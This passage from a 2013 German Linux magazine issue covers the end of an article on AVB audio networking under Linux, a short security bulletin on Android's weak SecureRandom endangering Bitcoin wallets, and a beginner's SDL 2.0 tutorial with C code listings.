Abbildung 3: Das Beispielprogramm »simple_listener« schreibt die empfangenen Audiodaten in eine Wav-Datei.
Schnittstellen für die Integration von AVB
mit Soundsystemen wie Alsa oder Jack.
Solche Anpassungen diskutieren die Entwickler
derzeit auf der Mailingliste des
Open-AVB-Projekts. In Setups mit zwei
Linux-Rechnern, die über eine I-210-Karte
mit dem AVB-Netzwerk verbunden sind,
soll die korrekte Übertragung von AVB-
Streams bereits geglückt sein.
Mit dem Netzwerk-Tool Wireshark lassen
sich alle AVB-Frames betrachten. Dafür
sind die Filter in Tabelle 1 relevant: So
lässt sich beispielsweise die MRP-Nachricht
»TalkerAdvertise« in den Netzwerkdaten
finden (Abbildung 4).
Zahlreiche Firmen investieren in die Entwicklung
und Umsetzung von AVB. Allerdings
gibt es trotz Standardisierung durch
die IEEE noch erhebliche Unterschiede
bei der Implementierung. Zurückzuführen
sind sie auf die vielen unterschiedlichen
Entwürfe der Standards.
Work in Progress
Der Open-AVB-Stack und die Intel-Karte
I 210 stellen die erste öffentliche Implementierung
von AVB für Linux dar. Man
darf gespannt sein, ob andere Hersteller
folgen und eigene Hardware anbieten.
Offen ist, ob sie in diesem Fall die Treiber
in den Open-AVB-Stack integrieren
oder einen eigenen Stack bereitstellen.
Wer derzeit AVB auf einem Linux-Rechner
benutzen möchte, ist auf Intels I 210
angewiesen. Zudem muss er noch viel
Anpassungs- und Integrationsarbeit investieren.
(mhu)
n
Infos
[1] Avnu Alliance: [http:// www. avnu. org]
[2] Avnu Alliance, „AVB for Automotive Use“:
[http:// www. avnu. org/ files/ static
_page_files/ AADD34CC‐1D09‐3519
‐AD2D3D331F524CF6/ AVnu%20Automotive__White%20Paper.
pdf]
[3] IEEE 802.1AS, „Timing and Synchronization
for Time (PTP)“:
[http:// standards. ieee. org/ findstds/​
standard/ 802. 1AS‐2011. html]
[4] IEEE 802.1Q-2011, Paragraph 35, „Stream
Reservation Protocol (SRP)“:
[http:// standards. ieee. org/ findstds/​
standard/ 802. 1Q‐2011. html]
[5] IEEE 802.1ak, „Multiple Registration Protocol
(MRP)“: [http:// standards. ieee. org/​
findstds/ standard/ 802. 1ak‐2007. html]
[6] IEEE 802.1Q-2011, Paragraph 34, „Forwarding
and Queueing Enhancements for
Time-Sensitive Streams“:
[http:// standards. ieee. org/ findstds/​
standard/ 802. 1Q‐2011. html]
[7] IEEE 1722, „Layer 2 Transport Protocol for
Time Sensitive Applications“:
[http:// standards. ieee. org/ findstds/​
standard/ 1722‐2011. html]
[8] IEC 61883 [http:// www.​
iec‐normen. de/ suche/ ergebnis/ ?​
produktsuche=IEC+61883]
[9] IEEE 1722.1, (AVDECC) D23v2, „Audio/​
Video Discovery, Enumeration, Configuration
and Control“: [http:// standards. ieee.​
org/ develop/ project/ 1722. 1. html]
[10] Riedel: [http:// www. riedel. net]
[11] Audinate: [http:// www. audinate. com]
[12] Uman [http:// umannet. de]
[13] XMOS: [http:// www. xmos. com]
[14] Labx Technologies:
[http:// www. labxtechnologies. com]
[15] DSP4You: [http:// www. dsp4you. com]
[16] Netgear: [http:// www. netgear. de]
[17] Extreme Networks:
[http:// www. extremenetworks. com]
[18] Marvell-Netzwerkkarten: [http:// www.​
marvell. com/ pc‐connectivity/]
[19] Open AVB: [https:// github. com/​
intel‐ethernet/ Open‐AVB]
AVB 11/2013
Know-how
www.linux-magazin.de
91
Abbildung 4: Wireshark findet im Netzwerkverkehr die Nachricht »TalkerAdvertise« des Protokolls MRP.
Der Autor
Christoph Kuhr stammt aus dem Rheinland und
arbeitet als freiberuflicher Tontechniker sowie
Digital-Audio-Entwickler. Sein Bachelorstudium
der technischen Informatik hat er mit einer
Arbeit über AVB abgeschlossen. In der Freizeit
spielt er leidenschaftlich gerne Gitarre.

Know-how
www.linux-magazin.de Insecurity Bulletin 11/2013
92
Insecurity Bulletin: Unsichere Zufallszahlen in Android
Schwacher Zufall
Gute Zufallszahlen sind der Schlüssel zu starker Kryptographie. Eine Schwäche in Androids Zahlengenerator
gefährdet den Kontostand von Anwendern, die mit der Alternativwährung Bitcoin bezahlen. Mark Vogelsberger
© Mellimage, Fotolia.com
Die Entwickler digitaler Geldbörsen für
An droid schlugen Anfang August 2013
Alarm: Die Bitcoin-Wallets waren unsicher,
ein Angreifer konnte an private
kryptographische Schlüssel des Besitzers
kommen und damit Geld abräumen [1].
Ursache ist ein Programmierfehler in
Googles Implementierung der Java-Klasse
»SecureRandom« der Java Cryptography
Architecture (JCA). Er führt dazu, dass
die Funktion »SecureRandom()« unter
Android keine korrekten Pseudozufallszahlen
erzeugt.
Update für die Geldbörse
Dies wirkt sich auf die Sicherheit kryptographischer
Verfahren aus, die bei
Bitcoin-Transaktionen zum Einsatz kommen.
Jede Transaktion mit der Internetwährung
ist mit einem privaten Schlüssel
signiert. Der Signiervorgang verwendet
eine von Android generierte Zufallszahl,
die aber wegen des Programmierfehlers
nicht völlig zufällig
war, da die erwähnte Java-Klasse
den Generator nicht korrekt initialisierte.
Android-Benutzer
berichteten in Foren, dass sie
mehrere Bitcoin-Transaktionen
mit gleichen Zufallszahlen bemerkten.
Hierdurch war die
verwendete Signatur identisch
und ein Angreifer konnte den
privaten Schlüssel des Besitzers
der Bitcoin-Geldbörse errechnen.
Hat der Angreifer erst
einmal diesen Schlüssel, so darf
er Transaktionen im Namen des
Opfers ausführen. Angeblich haben
im Zuge solcher Attacken
mehrere Tausend US-Dollar den
Besitzer gewechselt. Ein Proofof-Concept-Exploit
von Nikolai
Elenkow steht im Web zur Verfügung und
funktioniert unter Android 4.3 [2].
Anfällig für die Attacke sind Bitcoin-
Nutzer, die ihren privaten Schlüssel auf
einem Android-Gerät speichern und
von dort Bitcoin-Transaktionen ausgeführt
haben. Das gilt aber nur, wenn die
eingesetzte Applikation die fehlerhafte
Java-Klasse verwendet. Die folgenden
Bitcoin-Applikationen sind betroffen:
Bitcoin Wallet (Abbildung 1), Bitcoin
Spinner, Blockchain.info und Mycellium
Wallet. Korrigierte Updates dieser Apps
sind erhältlich. Applikationen, die sich
auf die Device-Datei »/dev/urandom«
zum Generieren von Pseudozufallszahlen
verlassen, sind von der Schwachstelle
nicht betroffen.
Für Anwendungsentwickler ist ein Beitrag
[3] im Android-Developer-Blog
interessant. Er beschreibt, wie man
Android-Applikationen modifiziert, um
diese Schwachstelle zu umgehen. Offen-
bar sieht der Android-Hersteller Google
vornehmlich die App-Entwickler in der
Pflicht, für die Sicherheit der Anwendungen
zu sorgen. Anfragen des Linux-
Magazins an den Internetkonzern, ob
es Nachbesserungen an Androids JCA-
Umsetzung geben werde, blieben unbeantwortet.
(mhu)
n
Infos
[1] Android Security Vulnerability: [http://​
bitcoin. org/ en/ alert/ 2013‐08‐11‐android]
[2] Proof-of-Concept von Nikolay Elenkov:
[https:// gist. github. com/ nelenkov/​
581f9be65dcc0b6b35b9]
[3] Alex Klyubin, „Some SecureRandom
Thoughts“: [http:// android‐developers.​
blogspot. com. au/ 2013/ 08/​
some‐securerandom‐thoughts. html]
Abbildung 1: Neben anderen wurde die App Bitcoin
Wallet ein Opfer der schwachen Zufallszahlen.

Programmieren
www.linux-magazin.de SDL 2.0 11/2013
94
Simple Directmedia Layer 2.0
Einsteigerfreundlich
Nach mehreren Jahren Entwicklungsarbeit ist im August die modernisierte Version 2.0 der Bibliothek SDL erschienen.
Trotz der zahlreichen Neuerungen fällt der Um- und Einstieg erstaunlich leicht. Tim Schürmann
Die Entwicklerversionen trugen zunächst
die Nummer 1.3, aufgrund der vielen
internen Änderungen machten die Entwickler
im Februar 2012 jedoch den
Sprung auf die Nummer 2.0. Obwohl
dieser neue Versionszweig bereits in vielen
Softwareprojekten zum Einsatz kam,
zögerten die Entwickler, ihm den Stempel
„Stabil“ aufzudrücken. Erst im August
dieses Jahres zog Erfinder und Projektleiter
Sam Lantinga einen Schlussstrich und
gab den aktuellen Entwicklungsstand offiziell
als Version 2.0.0 frei.
© kzenon, 123RF.com
Seit 1998 legt Simple Directmedia Layer
(SDL) die Grundlage für unzählige Spiele,
Multimedia-Anwendungen und sogar Virtualisierungslösungen.
Die kleine plattformunabhängige
Bibliothek erleichtert
es Anwendungen, auf die Grafikkarte,
die Audiohardware, die Tastatur und andere
Eingabegeräte zuzugreifen. Da sie
für viele verschiedene Plattformen und
Betriebssysteme erhältlich ist, lassen sich
mit ihr entwickelte Programme leicht
portieren (siehe Kasten „Unterstützte
Betriebssysteme“). Ohne sie müssten
Linux-Nutzer vermutlich immer noch auf
Unterstützte Betriebssysteme
Offiziell unterstützte die SDL 2.0.0 zum Redaktionsschluss
folgende Betriebssysteme:
n Linux ab Kernel 2.6
n Android ab Version 2.3.3
n Windows XP, Vista, 7 und 8
n Mac OS X ab Version 10.5
n I-OS ab Version 5.1.1
Unter Free BSD, Net BSD, Open BSD und Solaris
soll sich die SDL 2.0 zwar ebenfalls übersetzen
die Umsetzungen großer Spiele wie Portal
warten (Abbildungen 1 und 2).
Erstaunliche zwölf Jahre lang bildete
die Version 1.2 der SDL die Grundlage
zahlreicher Programme. Änderungen gab
es immer nur in homöopathischen Dosen,
die letzte Revision (1.2.15) erschien
im Januar 2012. Die SDL 1.2 gilt damit
zwar als äußerst robust, die Hardware-
Entwicklung hat sie jedoch gnadenlos
überholt. Im Hintergrund arbeiteten die
SDL-Entwickler deshalb schon seit mehreren
Jahren parallel an einer runderneuerten,
modernen Variante.
und einsetzen lassen, die Entwickler übernehmen
dafür aber keine Garantie. Zudem existieren
inoffizielle Portierungen auf Haiku, die
Playstation Portable und Pandora.
Damit ist die Liste der unterstützten Systeme
deutlich kürzer als die der SDL 1.2. Mangels
Maintainer musste das Team insbesondere die
Portierungen für ältere Betriebssysteme wie
OS/​2 und Beos streichen.
2.0 macht Tempo
Die neue Version kann endlich mehrere
Fenster gleichzeitig öffnen, erkennt
mehrere angeschlossene Bildschirme und
kann mehrere Audiogeräte gleichzeitig
ansteuern. Zur Ausgabe von 2-D-Grafik
nutzt die SDL ab sofort die Hardwarebeschleunigung
moderner 3-D-Grafikkarten.
Unter Linux finden die Bilddaten
dabei über die Open-GL-Schnittstelle ihren
Weg auf den Bildschirm. Im Notfall
oder auf Wunsch berechnet die schlanke
Bibliothek aber auch die Grafik mit einem
Software-Renderer selbst.
Die SDL bietet weiterhin nur Zeichenfunktionen
für 2-D-Grafiken an. 3-D-Grafiken
erzeugen Programmierer mit Open GL ab
Version 3.0 beziehungsweise Open GL ES
auf Mobilgeräten. Die SDL übernimmt
dann lediglich alle übrigen Aufgaben,
etwa die Audio-Ausgabe oder das Abfragen
der Tastatur. Unter Windows, Mac OS
X und Linux kann die neue SDL-Version
endlich mit Force-Feedback-Geräten umgehen,
zudem unterstützt sie Eingabegeräte
mit Touch-Oberfläche.
Verbessertes Powermanagement soll für
längere Laufzeiten vor allem auf Mobilgeräten
sorgen. Obendrauf kommen

Abbildung 1: Auf der SDL basieren fast alle über Steam angebotenen Spiele,
darunter auch Blockbuster wie das Knobelspiel Portal.
zahlreiche kleine Verbesserungen, etwa
die Unicode-Unterstützung. Vorhandene
SDL-Programme lassen sich recht leicht
auf die SDL 2.0 portieren, aufgrund der
zahlreichen Änderungen reicht jedoch
ein Neukompilieren nicht aus.
Auch bei der Lizenz gab es eine Änderung:
Die LGPL-Lizenz der alten SDL 1.2
erschwerte die Nutzung in kommerziellen
Projekten. Chefentwickler Sam Lantinga
gründete zwischenzeitlich sogar eine
Firma, über die Entwickler eine Lizenz
für kommerzielle Programme erwerben
konnten. Die neue Version 2.0 steht hingegen
unter der liberaleren Zlib-Lizenz,
die eine uneingeschränkte kommerzielle
Nutzung der Bibliothek erlaubt.
Inbetriebnahme
Die in C geschriebene SDL bietet selbst
nur eine C-Schnittstelle an. Diese lässt
sich aber direkt aus C++-Programmen
nutzen, Bindungen gibt es zudem schon
für Python, C# und Pascal [2]. Da die
SDL 2 noch keiner Distribution beiliegt,
muss der Entwickler sie selbst übersetzen
und einspielen. Um alle Funktionen nutzen
zu können, benötigt er neben einem
C-Compiler und »make« auch noch die
Entwicklerpakete zu X11, Open GL, Alsa,
Pulseaudio, Libudev, Pthreads, Dbus und
je nach Bedarf noch die des ESD (Enlightened
Sound Daemon), des Arts-Audio-
Servers und die Libts-Bibliothek zur Ansteuerung
von Touchscreens.
Die Installation ist mit dem üblichen
Dreisprung schnell erledigt: »./configure;
make; make install«.
Die Ausgaben von
»configure« sollte der
Anwender nach nicht
erfüllten Abhängigkeiten
durchsuchen.
Unter Umständen fehlen
sonst später im Betrieb
benötigte Funktionen,
zum Beispiel
die Unterstützung für
den ESD. Nach der Installation
sollte Root
sicherheitshalber einmal
»ldconfig« anwerfen.
SDL 2 lässt sich
übrigens problemlos
neben der alten SDL
1.2 installieren und
betreiben: Die Bibliothek selbst heißt
»libSDL2.so«, die Headerdateien landen
im Unterverzeichnis »SDL2«.
Erste Gehversuche
Da die SDL 2.0 ein klares und einfaches
API besitzt, fallen die ersten Schritte
leicht. Wer bereits mit der alten Version
1.2 gearbeitet hat, dürfte zudem einiges
wiedererkennen. Im eigenen Programm
bindet der Entwickler zunächst die SDL
über eine einzige Headerdatei ein:
#include "SDL2/SDL.h"
Bevor er die Funktionen der SDL nutzen
kann, muss er die Subsysteme der SDL
initialisieren. Das übernimmt:
SDL_Init(SDL_INIT_EVERYTHING);
Als Parameter erwartet
»SDL_Init()« ein so
genanntes Flag, das
angibt, welche Subsysteme
die Funktion
initialisieren soll. Das
Flag »SDL_INIT_EVE-
RYTHING« aktiviert
alle verfügbaren Subsysteme.
Wer später
nur Grafiken ausgeben
möchte, verwendet alternativ
»SDL_INIT_
VIDEO«.
Mehrere Flags darf der
Programmierer mit einem
logischen Oder
verknüpfen und so
mehrere ausgewählte Subsysteme initialisieren.
Die folgende Anweisung aktiviert
das Video- und das Audio-Subsystem:
SDL_Init(SDL_INIT_VIDEO | SDL_INIT_AUDIO);
War der Aufruf erfolgreich, liefert »SDL_
Init()« eine »0« zurück. Bei einem negativen
Wert ist hingegen ein Fehler aufgetreten.
Die Fehlermeldung dazu liefert die
Funktion »SDL_GetError()«. Diese Form
der Fehlerbehandlung nutzen auch die
meisten anderen SDL-Funktionen. Damit
eigener Code nicht gegen die Wand fährt,
sollte der Programmierer folglich immer
den Rückgabewert auswerten:
if (SDL_Init(SDL_INIT_EVERYTHING) != 0){
printf("Fehler: %s \n", SDL_GetError());
return 1;
}
War dies SDL-1.2-Nutzern noch vertraut,
folgt jetzt Neuland: Die SDL 2 schmeißt
das gute alte »SDL_SetVideoMode()«
über Bord.
Verlief die Initialisierung erfolgreich, kann
der Anwender ein Fenster öffnen. Die
dafür zuständige Funktion »SDL_Create-
Window()« verlangt als Parameter einen
Namen für die Titelleiste, die Position der
linken oberen Ecke des Fensters auf dem
Bildschirm sowie die Größe des Fensters
in Pixeln:
SDL_Window *fenster = SDL_CreateWindow(
"Hallo Welt!", 250, 300, 640, 480,U
SDL_WINDOW_SHOWN);
Hier trägt das Fenster den Titel »Hallo
Welt!«, erscheint 250 Pixel vom linken
und 300 Pixel vom oberen Bildschirmrand
Abbildung 2: Aber auch ernsthafte Anwendungen, zum Beispiel die Virtualisierungssoftware
Qemu und Virtualbox, nutzen die SDL unter anderem für
ihre Bildschirmausgaben.
SDL 2.0 11/2013
Programmieren
www.linux-magazin.de
95

Programmieren
www.linux-magazin.de SDL 2.0 11/2013
96
entfernt auf dem Desktop und ist außerdem
640 mal 480 Pixel groß. Das Flag
»SDL_WINDOW_SHOWN« sorgt dafür,
dass das Fenster definitiv auf dem Bildschirm
zu sehen ist – »SDL_WINDOW_
HIDDEN« würde es zunächst verstecken.
Eine Alternative wäre »SDL_WINDOW_
FULLSCREEN«, was den Fensterinhalt im
Vollbildmodus anzeigt. Auch hier gibt es
noch weitere Flags, die man per Oder
verknüpfen kann: So entfernt »SDL_WIN-
DOW_BORDERLESS« den Fensterrahmen,
während »SDL_WINDOW_MAXIMIZED«
das Fenster maximiert.
Die Funktion »SDL_CreateWindow()« liefert
einen Zeiger auf ein »SDL_Window«-
Objekt zurück. Über ihn lässt sich das
Fenster gleich ansprechen. Sollte ein
Fehler aufgetreten sein, dann ist der Zeiger
»NULL«. Den Grund verrät wieder
»SDL_GetError()«.
Großer Künstler
Als Nächstes benötigt der Entwickler einen
so genannten Renderer, das ist der
Maler, der in das Fenster zeichnet. Wie
er das macht, bleibt ihm selbst überlassen.
Unter Windows könnte er etwa
Direct X verwenden, unter Linux nutzt er
normalerweise Open GL. Einen Renderer
erzeugt die Funktion »SDL_CreateRenderer()«:
SDL_Renderer *renderer =U
SDL_CreateRenderer(fenster, ‐1,U
SDL_RENDERER_ACCELERATED |U
SDL_RENDERER_PRESENTVSYNC);
Als ersten Parameter erwartet sie einen
Zeiger auf das Fenster, in das der Ren-
Helfershelfer
Die SDL deckt mit ihrem Funktionsumfang nur
den Grundbedarf eines Spieleprogrammierers
ab. So lädt sie beispielsweise ausschließlich
Bilder im BMP-Format. Daher haben einige Entwickler
weitere Hilfsbibliotheken geschrieben:
SDL_net vereinfacht zum Beispiel den Zugriff
auf das Netzwerk, SDL_mixer ermöglicht das
Abmischen von Audiomaterial, SDL_ttf verschönert
Texte mit Truetype-Schriften, während
SDL_Image Bilder in gängigen Dateiformaten
einlädt.
Diese und einige weitere Bibliotheken haben
sogar den Status einer „offiziellen Erweiterung“
erhalten und eine Heimat auf der SDL-
Homepage gefunden. Seit der Neugestaltung
derer später alle Ausgaben schieben soll.
Die »‐1« weist die SDL an, einen Renderer
mit ganz bestimmten Eigenschaften
zu wählen. Welche das sind, geben die
nachfolgenden Flags vor. Im Beispiel
soll der Renderer die Hardwarebeschleunigung
der Grafikkarte nutzen (»SDL_
RENDERER_ACCELERATED«) und den
Bildaufbau mit der Bildschirmfrequenz
synchronisieren (»SDL_RENDERER_PRE-
SENTVSYNC«). »SDL_CreateRenderer()«
spuckt schließlich einen Zeiger auf einen
passenden Renderer aus. Ist dieser Zeiger
»NULL«, trat ein Fehler auf, den Grund
verrät »SDL_GetError()«.
Den Renderer kann der Entwickler nun
dazu anweisen, den Inhalt des Fensters
zu leeren:
SDL_SetRenderDrawColor(renderer, 235, 235,U
235, 255);
SDL_RenderClear(renderer);
Die erste Funktion setzt die Zeichenfarbe
auf ein Hellgrau mit dem RGB-Wert
»235, 235, 235«. Der letzte Parameter
von »SDL_SetRenderDrawColor()« legt
die Transparenz fest (genauer gesagt den
Wert des Alphakanals). Im vorliegenden
Fall soll der Renderer das Hellgrau deckend
auftragen. »SDL_RenderClear()«
malt anschließend das Fenster mit der
eingestellten Farbe aus.
Einladung
Um im Fenster ein Bild anzuzeigen, muss
der Programmierer es erst einmal laden.
Die SDL selbst bietet dazu lediglich die
Funktion »SDL_LoadBMP()« an, die ein
unkomprimiertes Bild im BMP-Format in
der Homepage sind sie jedoch nicht mehr direkt
verlinkt [3].
Zusammen mit der SDL haben auch die vier
oben genannten Bibliotheken einen Sprung auf
Version 2 gemacht. Im Wesentlichen unterstützen
sie die neuen Funktionen der SDL. So kann
SDL_Image das geladene Bild direkt als Textur
zurückgeben. Die folgende Anweisung holt so
das Tiff-Foto »logo.tiff« von der Festplatte:
SDL_Texture *logo = IMG_LoadTexture(U
renderer, "logo.tiff");
Da die Bibliotheken folglich nur noch mit SDL
2 zusammenarbeiten, heißen sie jetzt SDL2_
Image, SDL2_ttf, SDL2_mixer und SDL2_net.
den Speicher schaufelt. Dazu braucht der
Entwickler ihr lediglich den Dateinamen
zu übergeben:
SDL_Surface *bild = SDL_LoadBMP("logo.bmp");
Wie schon unter der alten SDL 1.2 ist das
Ergebnis ein Zeiger auf eine so genannte
Surface. Diese Datenstruktur kapselt einfach
die Bitmap im Hauptspeicher. Wer
andere Dateiformate einlesen möchte,
muss diese entweder selbst laden und in
eine »SDL_Surface«-Datenstruktur hämmern
oder zu einer Hilfsbibliothek wie
der beliebten SDL_Image greifen (siehe
Kasten „Helfershelfer“).
Konvertit
An dieser Stelle ergibt sich ein kleines
Problem: Der Renderer kann nur Texturen
und keine Surface in das Fenster
malen. Folglich muss der Programmierer
die Surface in eine Textur konvertieren:
SDL_Texture *textur = U
SDL_CreateTextureFromSurface(U
renderer, bild);
Da die Surface jetzt überflüssig ist, gibt
der Entwickler den von ihr belegten Speicherplatz
wieder frei:
SDL_FreeSurface(bild);
Abschließend muss er nur noch den Renderer
anweisen, die Textur in das Fenster
zu kopieren:
SDL_RenderCopy(renderer, textur, NULL,U
NULL);
Das »NULL« im vorletzten Parameter
weist den Renderer dazu an, die komplette
Textur – und nicht nur einen Ausschnitt
– in das Fenster zu zeichnen. Ist
der letzte Parameter »NULL«, passt der
Renderer die Textur in das Fenster ein.
Sofern die Textur (also das geladene Bild)
andere Abmessungen als das Fenster aufweist,
führt das zwangsweise zu einer
Verzerrung wie in Abbildung 3.
Einpassen
Um das zu ändern, verrät der Entwickler
der Funktion »SDL_RenderCopy()« noch
die Größe der Textur sowie die Position,
an der die linke obere Ecke des Bildes im
Fenster erscheinen soll. Diese Informationen
erwartet »SDL_RenderCopy()« in

SDL 2.0 11/2013
Programmieren
www.linux-magazin.de
97
Abbildung 3: Hier hat »SDL_RenderCopy()« Das Linux-Magazin-Logo in die
Abmessungen des Fensters gezwungen.
Abbildung 4: Erst wenn man »SDL_RenderCopy()« die Abmessungen und die Position
der Textur mit auf den Weg gibt, erscheint das Logo korrekt.
einem »SDL_Rect«. Das ist eine Datenstruktur,
die schlicht die Abmessungen
eines Rechtecks kapselt. Zunächst zeichnet
»SDL_RECT pos;« also ein Rechteck.
SDL zählt die Pixel von der linken oberen
Fensterecke, beginnend bei »0«. Im Beispiel
soll die linke obere Ecke der Textur
150 Pixel vom linken Fensterrand und 100
Pixel vom oberen Fensterrand entfernt erscheinen.
Diese beiden Werte wandern in
die Variablen »x« und »y«:
pos.x = 150;
pos.y = 100;
Wie breit und hoch die Textur im Fenster
erscheint, verraten die Variablen »pos.w«
und »pos.h«. Damit der Renderer die Textur
nicht verzerrt, weist der Programmierer
ihnen folglich die Breite und Höhe
der Textur zu. Diese beiden Werte kann
er entweder etwas umständlich mit einem
Malprogramm herausfinden oder
von der Funktion »SDL_QueryTexture()«
ermitteln lassen:
nur noch einen Zeiger auf »pos« zu übergeben,
das Ergebnis zeigt Abbildung 4:
SDL_RenderCopy(renderer, textur, NULL,U
&pos);
Nach dem gleichen Prinzip malt der
Programmierer weitere Texturen in das
Fenster. Dabei zeichnet der Renderer die
zuerst kopierten Texturen als Erstes. In
folgendem Beispiel
SDL_RenderCopy(renderer, hinten, NULL,U
NULL);
SDL_RenderCopy(renderer, vorne, NULL, NULL);
würde der Renderer erst die Textur »hinten«
in das Fenster malen und anschließend
die Textur »vorne« drüberkleben.
Zum Abschluss muss der Code den Renderer
noch anweisen den aktualisierten
Fensterinhalt anzuzeigen:
SDL_RenderPresent(renderer);
Dieser letzte Schritt scheint nur auf den
ersten Blick überflüssig: Würde der Renderer
jeden Zeichenvorgang direkt in
das Fenster malen, müsste der spätere
Anwender unter Umständen dabei zusehen,
wie sich das Bild aus den einzelnen
Texturen aufbaut. Die Folge wären unschöne,
flackernde Animationen.
Haltestelle
Wer die Codestücke jetzt zu einem Programm
zusammenfügen und starten
würde, bekäme ein kurz aufgerissenes
Fenster zu sehen, das sich sofort wieder
beendet. Um das zu verhindern, könnte
man das Programm einfach für 2 Sekunden
anhalten:
SDL_Delay(2000);
Eleganter ist es jedoch, den Benutzer
selbst das Programm per Tastendruck,
einen Klick in das Fenster oder über den
Schließen-Knopf in der Titelleiste beenden
zu lassen. Ab hier dürfte SDL-1.2-
Nutzern wieder einiges sehr bekannt
SDL_QueryTexture(textur, NULL, NULL,U
&pos.w, &pos.h);
Sie liefert neben der Weite und Höhe der
Textur auch das Pixelformat (RGB, YUV
oder Ähnliches) sowie einen Zeiger auf
die eigentliche Bitmap im Speicher. Diese
Informationen sind hier nicht weiter von
Interesse, weshalb sie »SDL_QueryTexture()«
aufgrund der beiden »NULL« für
sich behält.
In »pos« befinden sich jetzt die Position
und die Größe, in der der Renderer die
Textur in das Fenster malen soll. Der
Entwickler braucht »SDL_RenderCopy()«
Listing 1: Ereignisbehandlung in SDL
01 SDL_Event ereignis;
02 int quit=1;
03 while(quit) {
04 SDL_WaitEvent(&ereignis);
05 switch(ereignis.type) {
06 case SDL_QUIT:
07 printf("Fenster geschlossen\n");
08 quit=0;
09 break;
10 case SDL_KEYDOWN:
11 printf("Tastendruck\n");
12 printf("Physische Taste %s als Taste %s
gedrückt\n",
13 SDL_GetScancodeName(ereignis.key.
keysym.scancode),
14 SDL_GetKeyName(ereignis.key.keysym.
sym));
15 quit=0;
16 break;
17 case SDL_MOUSEBUTTONDOWN:
18 printf("Linke Maustaste gedrückt an\n");
19 printf("Position: (%d, %d)\n", ereignis.
motion.x, ereignis.motion.y);
20 quit=0;
21 break;
22 }
23 }

Programmieren
www.linux-magazin.de SDL 2.0 11/2013
98
vorkommen: Tastendrücke, Mausklicks
und andere Eingaben sind für die SDL
Ereignisse.
Bitte warten
Jedes ausgelöste Ereignis landet zunächst
in einer Warteschlange. Das nächste Ereignis
in der Schlange holt die Funktion
»SDL_WaitEvent()« ab. Sollte die Warteschlange
leer sein, wartet »SDL_Wait-
Event()« so lange, bis ein Ereignis auftritt.
Dann muss der Programmierer nur noch
abfragen, um welches Ereignis es sich
handelt. Das dabei entstehende Switch/​
Case-Monster zeigt Listing 1.
Die Hilfsvariable »quit« signalisiert lediglich,
ob das Programmende erreicht
ist. »SDL_WaitEvent()« holt aus der Warteschlange
das nächste Ereignis ab und
steckt es in eine Datenstruktur vom Typ
»SDL_Event«. Diese speichert in der Variablen
»type«, um welche Art Ereignis es
sich handelt. Drückt der Anwender eine
Taste, besitzt »type« den Wert »SDL_KEY-
DOWN«. Um welche Taste es sich dabei
handelt, verrät das Ereignis in der Variablen
»ereignis.key.keysym.scancode«.
Die Tastennummer übersetzt »SDL_Get-
ScancodeName()« in den entsprechenden
Buchstaben beziehungsweise die Tastenbezeichnung.
Da die Tastatur auf jedem System anders
belegt ist, weist die SDL jeder Taste
noch einen symbolischen Namen zu.
Er liegt in der Variablen »ereignis.key.
keysym.sym«, die Funktion »SDL_Get-
KeyName()« macht daraus ein lesbares
Ergebnis (siehe Abbildung 5). Sofern der
Anwender in das Fenster klickt, erzeugt
er ein Ereignis vom Typ »SDL_MOUSE-
BUTTONDOWN«. Die Koordinaten des
Mauszeigers liegen dabei in den Variablen
»ereignis.motion.x« und »ereignis.
motion.y«. Ein Spiel würde diese Koordinaten
auswerten und prüfen, welches
Spielobjekt darunterliegt.
Das Ereignis »SDL_QUIT« löst der Anwender
aus, wenn er das Programm schließt.
Neben diesen drei vorgestellten kennt die
SDL noch viele weitere Ereignisse [4].
Lässt der Anwender beispielsweise eine
Taste los, erzeugt das ein »SDL_KEYUP«-
Ereignis.
Runden drehen
Im Unterschied zur SDL 1.2 legt »SDL_
WaitEvent()« die Anwendung beziehungsweise
den Prozess nicht mehr
Listing 2: Ein Fenster öffnen, Bild und Textur laden und Tastendrücke registrieren
01 #include
02 #include "SDL2/SDL.h"
03
04 int main(int argc, char** argv){
05
06 // SDL initialisieren:
07 if (SDL_Init(SDL_INIT_EVERYTHING) != 0){
08 printf("Fehler: %s \n", SDL_GetError());
09 return 1;
10 }
11
12 // Fenster öffnen:
13 SDL_Window *fenster = SDL_CreateWindow("Hallo Welt!", 250, 300, 640,
480, SDL_WINDOW_SHOWN);
14
15 // Renderer erstellen:
16 SDL_Renderer *renderer = SDL_CreateRenderer(fenster, ‐1,
SDL_RENDERER_ACCELERATED | SDL_RENDERER_PRESENTVSYNC);
17
18 // Zeichenfarbe auf Schwarz setzen und dann Fenster leeren:
19 SDL_SetRenderDrawColor(renderer, 235, 235, 235, 255);
20 SDL_RenderClear(renderer);
21
22 // Bild laden:
23 SDL_Surface *bild = SDL_LoadBMP("logo.bmp");
24
25 // Textur erzeugen und Surface löschen:
26 SDL_Texture *textur = SDL_CreateTextureFromSurface(renderer, bild);
27 SDL_FreeSurface(bild);
28
29 // Größe und Position des Bildes im Fenster festlegen:
30 SDL_Rect pos;
31 pos.x = 150;
32 pos.y = 100;
33 SDL_QueryTexture(textur, NULL, NULL, &pos.w, &pos.h);
34
35 // Textur in das Fenster kleben:
36 SDL_RenderCopy(renderer, textur, NULL, &pos);
37
38 // Anzeigen:
39 SDL_RenderPresent(renderer);
40
41 // Warte auf Tastendruck oder Mausklick:
42 SDL_Event ereignis;
43 int quit=1;
44 while(quit) {
45 SDL_WaitEvent(&ereignis);
46 switch(ereignis.type) {
47 case SDL_QUIT:
48 printf("Fenster geschlossen\n");
49 quit=0;
50 break;
51 case SDL_KEYDOWN:
52 printf("Tastendruck\n");
53 printf("Physische Taste %s als Taste %s gedrückt\n",
54 SDL_GetScancodeName(ereignis.key.keysym.scancode),
55 SDL_GetKeyName(ereignis.key.keysym.sym));
56 quit=0;
57 break;
58 case SDL_MOUSEBUTTONDOWN:
59 printf("Linke Maustaste gedrückt an\n");
60 printf("Position: (%d, %d)\n", ereignis.motion.x,
ereignis.motion.y);
61 quit=0;
62 break;
63 }
64 }
65
66 SDL_DestroyTexture(textur);
67 SDL_DestroyRenderer(renderer);
68 SDL_DestroyWindow(fenster);
69 SDL_Quit();
70
71 return 0;
72 }

Abbildung 5: Im unteren Beispiel hat der Anwender
die physische Taste [;] gedrückt, die auf seiner
deutschen Tastatur aber mit dem [ö] belegt ist.
Der Programmierer sollte möglichst den virtuellen
Keycode auswerten.
schlafen. Stattdessen durchläuft »SDL_
WaitEvent()« intern einfach so lange eine
Schleife, bis ein Ereignis auftritt. Die Entwickler
haben jedoch schon angedroht,
dass sich dieses Verhalten in Zukunft
